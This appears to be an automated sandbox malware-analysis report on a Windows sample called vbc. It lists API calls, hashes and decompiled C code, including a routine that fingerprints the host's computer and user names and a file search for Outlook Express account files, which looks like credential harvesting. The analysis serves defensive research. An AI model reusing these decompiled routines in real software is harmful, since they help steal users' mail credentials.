                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • UnmapViewOfFile.KERNEL32(?,00000000,00000000,?,00415610,?,00000000), ref: 0041542C
                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00415438
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseFileHandleUnmapView
                                                                                                                                                    • String ID: !-A
                                                                                                                                                    • API String ID: 2381555830-3879722540
                                                                                                                                                    • Opcode ID: e8c78a8d6966c789a432285f25c1a97e3c9752e60e4576fb47e50e48bcd826d3
                                                                                                                                                    • Instruction ID: 6c5ed3bf8746cf55bcd37c1067f9027f6bc59eb5530dee428a664ff8177fa162
                                                                                                                                                    • Opcode Fuzzy Hash: e8c78a8d6966c789a432285f25c1a97e3c9752e60e4576fb47e50e48bcd826d3
                                                                                                                                                    • Instruction Fuzzy Hash: 5611BF35500B10DFCB319F25E945BD777E0FF84712B00492EE4929A662C738F8C48B48
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040BD10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _snwprintf.MSVCRT ref: 0040BD3E
                                                                                                                                                    • _snwprintf.MSVCRT ref: 0040BD5E
                                                                                                                                                      • Part of subcall function 00407176: wcslen.MSVCRT ref: 00407183
                                                                                                                                                      • Part of subcall function 00407176: WriteFile.KERNEL32(00000001,00000000,00000000,00000000,00000000,?,?,0040BC47,00000000,00443980,00000000,0040C656,00000000), ref: 00407192
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _snwprintf$FileWritewcslen
                                                                                                                                                    • String ID: %%-%d.%ds
                                                                                                                                                    • API String ID: 889019245-2008345750
                                                                                                                                                    • Opcode ID: 0621875c29823bfdd60080e68f211d35d61c8b83eb007e49ef2e77d3973846ff
                                                                                                                                                    • Instruction ID: f6bde454874e3f12fe5a715dcb314e2825e8b387052435345983f70e28f49e73
                                                                                                                                                    • Opcode Fuzzy Hash: 0621875c29823bfdd60080e68f211d35d61c8b83eb007e49ef2e77d3973846ff
                                                                                                                                                    • Instruction Fuzzy Hash: 1D01D871500604BFD7109F69CC82D6AB7F9FF48318B10442EF946AB2A2DB75F841DB64
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00408116 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memicmpwcslen
                                                                                                                                                    • String ID: History
                                                                                                                                                    • API String ID: 1872909662-3892791767
                                                                                                                                                    • Opcode ID: bae70ed05e2484058d162cab4743c52f8bd5b62447447ec07eacc4e847ca5ebf
                                                                                                                                                    • Instruction ID: 2715e0f5b76d9e8bf3bfa22bf35e41ec2dcc8bed56e6222f305abdff7d2b472d
                                                                                                                                                    • Opcode Fuzzy Hash: bae70ed05e2484058d162cab4743c52f8bd5b62447447ec07eacc4e847ca5ebf
                                                                                                                                                    • Instruction Fuzzy Hash: 7BF0A4721046029BD210EA299D41A2BB7E8DF813A8F11093FF4D196282DF79DC5646A9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00407B1D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileNameSavewcscpy
                                                                                                                                                    • String ID: X
                                                                                                                                                    • API String ID: 3080202770-3081909835
                                                                                                                                                    • Opcode ID: 24396636a29f1ce25200a1500eee54acd60350c694163d5da58a3a079e5601d4
                                                                                                                                                    • Instruction ID: df6fc214ccc966a4ef74be52ccb1fa8de01b9f2d97edd1d3ec6f174b54628a36
                                                                                                                                                    • Opcode Fuzzy Hash: 24396636a29f1ce25200a1500eee54acd60350c694163d5da58a3a079e5601d4
                                                                                                                                                    • Instruction Fuzzy Hash: C801E5B1E002499FDF00DFE9D8847AEBBF4AF08319F10402AE815E6280DB78A949CF55
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040AC82 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • memset.MSVCRT ref: 0040AC9A
                                                                                                                                                    • SendMessageW.USER32(?,0000105F,00000000,?), ref: 0040ACC9
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSendmemset
                                                                                                                                                    • String ID: "
                                                                                                                                                    • API String ID: 568519121-123907689
                                                                                                                                                    • Opcode ID: 25315a415076cbab8121a395ef60f2b275a5e49d8e8cab10b2ef02e751b77d98
                                                                                                                                                    • Instruction ID: c9b4fa4cd35477e261f68ac5278df415403352ef960fa58aa17ae8539a272808
                                                                                                                                                    • Opcode Fuzzy Hash: 25315a415076cbab8121a395ef60f2b275a5e49d8e8cab10b2ef02e751b77d98
                                                                                                                                                    • Instruction Fuzzy Hash: 4E01D635800304EBEB20DF5AC841AEFB7F8FF84745F01802AE854A6281D3349955CF79
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004017B7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetWindowPlacement.USER32(?,?,?,?,?,0040D8F3,?,General,?,?,?,?,?,00000000,00000001), ref: 004017E0
                                                                                                                                                    • memset.MSVCRT ref: 004017F3
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: PlacementWindowmemset
                                                                                                                                                    • String ID: WinPos
                                                                                                                                                    • API String ID: 4036792311-2823255486
                                                                                                                                                    • Opcode ID: ebc0bb48f8a97b617363729f7cf0900b593d1d2e388969c7686af9c2b4b0c1d2
                                                                                                                                                    • Instruction ID: 403492ab1ae1e8e085d1b686bd15613ed323b870b3f74ac0ef6546771a88dbd4
                                                                                                                                                    • Opcode Fuzzy Hash: ebc0bb48f8a97b617363729f7cf0900b593d1d2e388969c7686af9c2b4b0c1d2
                                                                                                                                                    • Instruction Fuzzy Hash: BDF0FF71600204ABEB14EFA5D989F6E73E8AF04700F544479E9099B1D1D7B899008B69
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00407AB6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileNameOpenwcscpy
                                                                                                                                                    • String ID: X
                                                                                                                                                    • API String ID: 3246554996-3081909835
                                                                                                                                                    • Opcode ID: 7dbed658630cd8f1005308aafbad7de56d353a569406e82a8f6fc1bcbb586f5c
                                                                                                                                                    • Instruction ID: 22468463e432baa7279a8bf0e718ba1534ae3331c134da9758c07f59fbfd6832
                                                                                                                                                    • Opcode Fuzzy Hash: 7dbed658630cd8f1005308aafbad7de56d353a569406e82a8f6fc1bcbb586f5c
                                                                                                                                                    • Instruction Fuzzy Hash: 6601B2B1D0024CAFCB40DFE9D8856CEBBF8AF09708F10802AE819F6240EB7495458F54
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040AB7D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0040757A: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040AB83,00000000,0040AA36,?,00000000,00000208,?), ref: 00407585
                                                                                                                                                    • wcsrchr.MSVCRT ref: 0040AB86
                                                                                                                                                    • wcscat.MSVCRT ref: 0040AB9C
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileModuleNamewcscatwcsrchr
                                                                                                                                                    • String ID: _lng.ini
                                                                                                                                                    • API String ID: 383090722-1948609170
                                                                                                                                                    • Opcode ID: d99e0c1e210eb6d30fbb9606f358fc75cd7c920557a2e7d7f41dfd12b806f831
                                                                                                                                                    • Instruction ID: faf96e17328b6cfe7fea8df6c793311bae4d5162fb77f626620ffa022952bc65
                                                                                                                                                    • Opcode Fuzzy Hash: d99e0c1e210eb6d30fbb9606f358fc75cd7c920557a2e7d7f41dfd12b806f831
                                                                                                                                                    • Instruction Fuzzy Hash: E6C0125394672070F52233226E13B8F17696F22306F60002FF901280C3EFAC631180AF
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0042917D Relevance: 5.2, APIs: 4, Instructions: 181COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memcpy$memset
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 438689982-0
                                                                                                                                                    • Opcode ID: 8de3b15170db9a09aff60384115cf250075a5608c27ba135c8b23c8b853ebfd7
                                                                                                                                                    • Instruction ID: 8c22702d92a242b4074cdc0308f2d59ea0ad553ae454c6356856be76eef94a8a
                                                                                                                                                    • Opcode Fuzzy Hash: 8de3b15170db9a09aff60384115cf250075a5608c27ba135c8b23c8b853ebfd7
                                                                                                                                                    • Instruction Fuzzy Hash: 2551A775A0021AFBEF15DF95DC81AEEB775FF04340F54849AF805A6241E7389E50CBA8
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00407EDE Relevance: 5.1, APIs: 4, Instructions: 69COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • wcslen.MSVCRT ref: 00407EF0
                                                                                                                                                      • Part of subcall function 00407475: malloc.MSVCRT ref: 00407491
                                                                                                                                                      • Part of subcall function 00407475: memcpy.MSVCRT ref: 004074A9
                                                                                                                                                      • Part of subcall function 00407475: free.MSVCRT(00000000,00000000,?,00408025,00000002,?,00000000,?,004082EE,00000000,?,00000000), ref: 004074B2
                                                                                                                                                    • free.MSVCRT(?,00000001,?,00000000,?,?,0040833F,?,000000FF), ref: 00407F16
                                                                                                                                                    • free.MSVCRT(?,00000001,?,00000000,?,?,0040833F,?,000000FF), ref: 00407F39
                                                                                                                                                    • memcpy.MSVCRT ref: 00407F5D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: free$memcpy$mallocwcslen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 726966127-0
                                                                                                                                                    • Opcode ID: 53bb7909089ec0eedd8dd5e24e0ed79610a14058f15925bc4f6bfad5848592c5
                                                                                                                                                    • Instruction ID: 7e4f8ba4ba14ff744b1d1ae1a3210968bf085ae1c99a6b147d894c05d7fb7a00
                                                                                                                                                    • Opcode Fuzzy Hash: 53bb7909089ec0eedd8dd5e24e0ed79610a14058f15925bc4f6bfad5848592c5
                                                                                                                                                    • Instruction Fuzzy Hash: 9E21AC71504605EFD720DF18C880C9AB7F4EF443247108A2EF866AB6A1D734F916CB54
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040AD07 Relevance: 5.1, APIs: 4, Instructions: 68COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ??2@$memset
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1860491036-0
                                                                                                                                                    • Opcode ID: cfaf489efad96e13d7650dd90a1e479029915f4aea12b774901758b52b152337
                                                                                                                                                    • Instruction ID: 8f402eb808e7ad555a909232128954833d185930e872f23c51b71e42452eb786
                                                                                                                                                    • Opcode Fuzzy Hash: cfaf489efad96e13d7650dd90a1e479029915f4aea12b774901758b52b152337
                                                                                                                                                    • Instruction Fuzzy Hash: B121F7B0A017009FD7258F6A8545A52FBE5FF90311B29C9AFE108CBAB2D7B8C800CF15
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00414C13 Relevance: 5.0, APIs: 4, Instructions: 41COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,004159A7,000000FF,00000000,00000000,00415592,?,?,00415592,004159A7,00000000,?,00415C14,?,00000000), ref: 00414C2E
                                                                                                                                                    • malloc.MSVCRT ref: 00414C36
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,004159A7,000000FF,00000000,00000000,?,00415592,004159A7,00000000,?,00415C14,?,00000000,00000000,?), ref: 00414C4D
                                                                                                                                                    • free.MSVCRT(00000000,?,00415592,004159A7,00000000,?,00415C14,?,00000000,00000000,?), ref: 00414C54
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ByteCharMultiWide$freemalloc
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2605342592-0
                                                                                                                                                    • Opcode ID: 62b04034a6b45e285efb8e28dd2072d8972627255b60333d693d9c35b4441962
                                                                                                                                                    • Instruction ID: ac963edc179c34f330cc22ede2b288a34a1f5b158d5d5a2152ff40f2e70c1069
                                                                                                                                                    • Opcode Fuzzy Hash: 62b04034a6b45e285efb8e28dd2072d8972627255b60333d693d9c35b4441962
                                                                                                                                                    • Instruction Fuzzy Hash: 9AF0A77220521E3BE61026A55C40D7B778CEB86375B10072BB910E21C1FD59D80006B4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Executed Functions

                                                                                                                                                    Function 0040724C Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 143stringCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 129 40724c-407395 memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 130 407397 129->130 131 4073cb-4073ce 129->131 132 40739d-4073a6 130->132 133 4073d0-4073d9 131->133 134 4073ff-407403 131->134 135 4073a8-4073ac 132->135 136 4073ad-4073c9 132->136 137 4073e0-4073fd 133->137 138 4073db-4073df 133->138 135->136 136->131 136->132 137->133 137->134 138->137
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E0040724C(signed int _a4) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				void _v20;
				long _v24;
				int _v28;
				int _v32;
				void* _v36;
				void _v291;
				char _v292;
				void _v547;
				char _v548;
				void _v1058;
				short _v1060;
				void _v1570;
				short _v1572;
				int _t88;
				signed int _t91;
				signed int _t92;
				signed int _t94;
				signed int _t96;
				signed int _t99;
				signed int _t104;
				signed short* _t110;
				void* _t113;
				void* _t114;

				_t92 = 0;
				_v20 = 0xa3;
				_v19 = 0x1e;
				_v18 = 0xf3;
				_v17 = 0x69;
				_v16 = 7;
				_v15 = 0x62;
				_v14 = 0xd9;
				_v13 = 0x1f;
				_v12 = 0x1e;
				_v11 = 0xe9;
				_v10 = 0x35;
				_v9 = 0x7d;
				_v8 = 0x4f;
				_v7 = 0xd2;
				_v6 = 0x7d;
				_v5 = 0x48;
				_v292 = 0;
				memset( &_v291, 0, 0xff);
				_v548 = 0;
				memset( &_v547, 0, 0xff);
				_v1572 = 0;
				memset( &_v1570, 0, 0x1fe);
				_v1060 = 0;
				memset( &_v1058, 0, 0x1fe);
				_v36 = _a4 + 4;
				_a4 = 0;
				_v24 = 0xff;
				GetComputerNameA( &_v292,  &_v24); // executed
				_v24 = 0xff;
				GetUserNameA( &_v548,  &_v24); // executed
				MultiByteToWideChar(0, 0,  &_v292, 0xffffffff,  &_v1572, 0xff);
				MultiByteToWideChar(0, 0,  &_v548, 0xffffffff,  &_v1060, 0xff);
				_v32 = strlen( &_v292);
				_t88 = strlen( &_v548);
				_t113 = _v36;
				_v28 = _t88;
				memcpy(_t113,  &_v20, 0x10);
				_t91 = 0xba0da71d;
				if(_v28 > 0) {
					_t110 =  &_v1060;
					do {
						_t104 = _a4 & 0x80000003;
						if(_t104 < 0) {
							_t104 = (_t104 - 0x00000001 | 0xfffffffc) + 1;
						}
						_t96 = ( *_t110 & 0x0000ffff) * _t91;
						_t91 = _t91 * 0xbc8f;
						 *(_t113 + _t104 * 4) =  *(_t113 + _t104 * 4) ^ _t96;
						_a4 = _a4 + 1;
						_t110 =  &(_t110[1]);
					} while (_a4 < _v28);
				}
				if(_v32 > _t92) {
					do {
						_t99 = _a4 & 0x80000003;
						if(_t99 < 0) {
							_t99 = (_t99 - 0x00000001 | 0xfffffffc) + 1;
						}
						_t94 = ( *(_t114 + _t92 * 2 - 0x620) & 0x0000ffff) * _t91;
						_t91 = _t91 * 0xbc8f;
						 *(_t113 + _t99 * 4) =  *(_t113 + _t99 * 4) ^ _t94;
						_a4 = _a4 + 1;
						_t92 = _t92 + 1;
					} while (_t92 < _v32);
				}
				return _t91;
			}









































                                                                                                                                                    0x0040725d
                                                                                                                                                    0x00407268
                                                                                                                                                    0x0040726c
                                                                                                                                                    0x00407270
                                                                                                                                                    0x00407274
                                                                                                                                                    0x00407278
                                                                                                                                                    0x0040727c
                                                                                                                                                    0x00407280
                                                                                                                                                    0x00407284
                                                                                                                                                    0x00407288
                                                                                                                                                    0x0040728c
                                                                                                                                                    0x00407290
                                                                                                                                                    0x00407294
                                                                                                                                                    0x00407298
                                                                                                                                                    0x0040729c
                                                                                                                                                    0x004072a0
                                                                                                                                                    0x004072a4
                                                                                                                                                    0x004072a8
                                                                                                                                                    0x004072ae
                                                                                                                                                    0x004072bc
                                                                                                                                                    0x004072c2
                                                                                                                                                    0x004072d5
                                                                                                                                                    0x004072dc
                                                                                                                                                    0x004072ea
                                                                                                                                                    0x004072f1
                                                                                                                                                    0x004072fc
                                                                                                                                                    0x0040730d
                                                                                                                                                    0x00407310
                                                                                                                                                    0x00407313
                                                                                                                                                    0x00407324
                                                                                                                                                    0x00407327
                                                                                                                                                    0x00407346
                                                                                                                                                    0x0040735b
                                                                                                                                                    0x00407369
                                                                                                                                                    0x00407373
                                                                                                                                                    0x00407378
                                                                                                                                                    0x0040737b
                                                                                                                                                    0x00407385
                                                                                                                                                    0x00407390
                                                                                                                                                    0x00407395
                                                                                                                                                    0x00407397
                                                                                                                                                    0x0040739d
                                                                                                                                                    0x004073a0
                                                                                                                                                    0x004073a6
                                                                                                                                                    0x004073ac
                                                                                                                                                    0x004073ac
                                                                                                                                                    0x004073b0
                                                                                                                                                    0x004073b3
                                                                                                                                                    0x004073bc
                                                                                                                                                    0x004073be
                                                                                                                                                    0x004073c5
                                                                                                                                                    0x004073c6
                                                                                                                                                    0x0040739d
                                                                                                                                                    0x004073ce
                                                                                                                                                    0x004073d0
                                                                                                                                                    0x004073d3
                                                                                                                                                    0x004073d9
                                                                                                                                                    0x004073df
                                                                                                                                                    0x004073df
                                                                                                                                                    0x004073e8
                                                                                                                                                    0x004073eb
                                                                                                                                                    0x004073f4
                                                                                                                                                    0x004073f6
                                                                                                                                                    0x004073f9
                                                                                                                                                    0x004073fa
                                                                                                                                                    0x004073d0
                                                                                                                                                    0x00407403

                                                                                                                                                    APIs
                                                                                                                                                    • memset.MSVCRT ref: 004072AE
                                                                                                                                                    • memset.MSVCRT ref: 004072C2
                                                                                                                                                    • memset.MSVCRT ref: 004072DC
                                                                                                                                                    • memset.MSVCRT ref: 004072F1
                                                                                                                                                    • GetComputerNameA.KERNEL32(?,?), ref: 00407313
                                                                                                                                                    • GetUserNameA.ADVAPI32(?,?), ref: 00407327
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00407346
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 0040735B
                                                                                                                                                    • strlen.MSVCRT ref: 00407364
                                                                                                                                                    • strlen.MSVCRT ref: 00407373
                                                                                                                                                    • memcpy.MSVCRT ref: 00407385
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                                                                                                                    • String ID: 5$H$O$b$i$}$}
                                                                                                                                                    • API String ID: 1832431107-3760989150
                                                                                                                                                    • Opcode ID: 892f1d25977d50633ddef969ddbe2b4ff3cde350e5ee45bf306cc9825cca91de
                                                                                                                                                    • Instruction ID: 8a8033fc9206e0c4c361a826d49ab5f0cafd1e40d7200dcd25d3d532c5214641
                                                                                                                                                    • Opcode Fuzzy Hash: 892f1d25977d50633ddef969ddbe2b4ff3cde350e5ee45bf306cc9825cca91de
                                                                                                                                                    • Instruction Fuzzy Hash: AC510871C0025DBEDB11CBA8CC41AEEBBBDEF49314F0442EAE955E6191D3389B84CB65
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00406EC3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58filestringCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 378 406ec3-406ecc 379 406ece-406eed FindFirstFileA 378->379 380 406eef-406f03 FindNextFileA 378->380 381 406f0a-406f0f 379->381 382 406f11-406f3f strlen * 2 380->382 383 406f05 call 406f5b 380->383 381->382 385 406f54-406f5a 381->385 386 406f41-406f4c call 4062ad 382->386 387 406f4e 382->387 383->381 389 406f51-406f53 386->389 387->389 389->385
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E00406EC3(void** __eax) {
				void* __esi;
				void* _t15;
				int _t16;
				int _t17;
				void* _t26;
				void** _t38;
				void** _t40;
				void* _t45;

				_t40 = __eax;
				_t15 =  *__eax;
				if(_t15 != 0xffffffff) {
					_t16 = FindNextFileA(_t15,  &(__eax[0x52])); // executed
					 *(_t45 + 4) = _t16;
					if(_t16 != 0) {
						goto L5;
					} else {
						E00406F5B(_t40);
						goto L4;
					}
				} else {
					_t26 = FindFirstFileA( &(__eax[1]),  &(__eax[0x52])); // executed
					 *_t40 = _t26;
					 *(_t45 + 4) = 0 | _t26 != 0xffffffff;
					L4:
					if( *(_t45 + 4) != 0) {
						L5:
						_t38 =  &(_t40[0xa2]);
						_t28 =  &(_t40[0x5d]);
						_t41 =  &(_t40[0xf3]);
						_t17 = strlen( &(_t40[0xf3]));
						if(strlen( &(_t40[0x5d])) + _t17 + 1 >= 0x143) {
							 *_t38 = 0;
						} else {
							E004062AD(_t38, _t41, _t28);
						}
					}
				}
				return  *(_t45 + 4);
			}











                                                                                                                                                    0x00406ec5
                                                                                                                                                    0x00406ec7
                                                                                                                                                    0x00406ecc
                                                                                                                                                    0x00406ef7
                                                                                                                                                    0x00406eff
                                                                                                                                                    0x00406f03
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00406f05
                                                                                                                                                    0x00406f05
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00406f05
                                                                                                                                                    0x00406ece
                                                                                                                                                    0x00406ed9
                                                                                                                                                    0x00406ee7
                                                                                                                                                    0x00406ee9
                                                                                                                                                    0x00406f0a
                                                                                                                                                    0x00406f0f
                                                                                                                                                    0x00406f11
                                                                                                                                                    0x00406f14
                                                                                                                                                    0x00406f1a
                                                                                                                                                    0x00406f20
                                                                                                                                                    0x00406f27
                                                                                                                                                    0x00406f3f
                                                                                                                                                    0x00406f4e
                                                                                                                                                    0x00406f41
                                                                                                                                                    0x00406f45
                                                                                                                                                    0x00406f4b
                                                                                                                                                    0x00406f53
                                                                                                                                                    0x00406f0f
                                                                                                                                                    0x00406f5a

                                                                                                                                                    APIs
                                                                                                                                                    • FindFirstFileA.KERNELBASE(?,?,?,?,00410CA1,*.oeaccount,rA,?,00000104), ref: 00406ED9
                                                                                                                                                    • FindNextFileA.KERNELBASE(?,?,?,?,00410CA1,*.oeaccount,rA,?,00000104), ref: 00406EF7
                                                                                                                                                    • strlen.MSVCRT ref: 00406F27
                                                                                                                                                    • strlen.MSVCRT ref: 00406F2F
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
